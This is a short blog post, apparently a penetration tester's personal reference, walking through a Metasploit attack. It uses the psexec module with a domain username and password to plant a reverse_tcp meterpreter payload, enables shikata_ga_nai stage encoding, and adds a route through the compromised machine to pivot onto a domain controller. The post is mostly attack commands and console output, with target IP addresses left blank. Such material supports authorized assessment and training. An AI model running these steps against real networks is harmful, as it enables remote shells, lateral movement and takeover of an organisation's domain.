While this topic has been discussed extensively online, it seems that few people pay attention to markup language and/or links on their posts.

How annoying is that?! Really, this post is for my own reference, however, you are more than welcome to use it. ;)

The Situation

In a recent assessment, I was asked to please ensure that if I infect a host that I use said host to tunnel subsequent meterpreter sessions through.

One of the reasons for this was to replicate an attacker pivoting systems to further scan, infect, etc. other systems on the network and other subnets.

At a high level, this is what needed to be done:


This post assumes you already have credentials and that systems you're exploiting have access to other subnets.

  • Protoxin:
  • Pwn'd computer 1:
  • Domain controller:

Using Metasploit, we will be using the psexec module to deploy a meterpreter payload on Computer1. Let's begin by setting up our options:

msf> use exploit/windows/smb/psexec
msf (windows/smb/psexec)> set RHOST
msf (windows/smb/psexec)> set SMBDomain lab.net
msf (windows/smb/psexec)> set SMBUser bob
msf (windows/smb/psexec)> set SMBPass B0blovescats1
msf (windows/smb/psexec)> set payload windows/meterpreter/reverse_tcp
msf (windows/smb/psexec)> set LHOST
msf (windows/smb/psexec)> set LPORT 3389

Pretty standard, right? One thing I like to do is enable stage encoding and use shikata_ga_nai. This can be done with the following:

msf (windows/smb/psexec)> set EnableStageEncoding true
msf (windows/smb/psexec)> set StageEncoder x86/shikata_ga_nai

Next up, run the thing!

msf (windows/smb/psexec)> run
[+]Started reverse handler on
[+]Connecting to the server...
[+]Authenticating as user 'bob'...
[+]Uploading payload

The next thing that you will want to do is background the meterpreter session.

meterpreter> background
[+]Backgrounding session 1...

Note that you can use the autoroute functionality of meterpreter. In this post, however, we are going to leverage Metasploit's route command. We know that our system can communicate directly to the domain controller, however, for some reason we cannot.

Let's add the route so we can continue:

msf (windows/smb/psexec)> route add 1

This adds are route to the 192.168.2 network. Note that we specified the netmask and specified the session number (1). Now, let's use Computer1 as a passthrough/pivot onto the domain controller! Luckily for us, Metasploit will handle a lot of the heavy lifting for us. Be sure that you set the LHOST value for the payload to the IP belonging to the session you set a route for.

msf (windows/smb/psexec)> set RHOST
msf (windows/smb/psexec)> set LHOST
msf (windows/smb/psexec)> run

[*] Started reverse handler on via the meterpreter on session 1

Look at that fancy! We've now pivoted onto the domain controller via Computer1.

If you'd like to see some graphics and more detail into this, check out:


As I stated at the beginning, this post is for my own reference, however, you are more than welcome to use it.